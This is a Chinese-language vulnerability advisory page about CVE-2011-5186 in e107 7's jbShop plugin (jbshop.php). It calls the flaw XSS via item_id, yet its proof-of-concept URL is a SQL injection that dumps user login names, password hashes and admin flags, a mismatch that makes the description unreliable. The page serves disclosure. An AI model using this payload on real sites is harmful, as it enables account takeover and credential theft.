Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / e107 7 jbShop插件jbshop.php内XSS漏洞

发布日期:2012-09-23
更新日期:2012-10-05受影响系统:
e107 e107 7
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2011-5186e107是用php编写的内容管理系统。e107 7版本的jbShop插件jbshop.php内存在XSS漏洞,可允许远程攻击者通过item_id参数注入任意Web脚本或HTML。<*来源:Robert Cooper
 
  链接:http://www.exploit-db.com/exploits/18056/
        http://www.osvdb.org/83371
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Robert Cooper ()提供了如下测试方法:
PoC:
 
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--建议:
--------------------------------------------------------------------------------
厂商补丁:e107
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://e107plugins.co.uk/RivetTracker内的torrent_functions.php多个SQL注入漏洞RivetTracker多个SQL注入漏洞相关资讯      e107  e107漏洞  e107安全漏洞  XSS漏洞 
  • 开源 Web 应用最常见漏洞是 XSS 和  (02月28日)
  • e107 "/e107_admin/newspost.php"  (01/08/2013 08:38:17)
  • Drupal Lingotek模块跨站脚本执行  (10/09/2012 00:31:59)
  • JBoss Enterprise Application   (01/29/2013 10:17:37)
  • e107 "e107_admin/download.php"跨  (01/08/2013 08:36:35)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论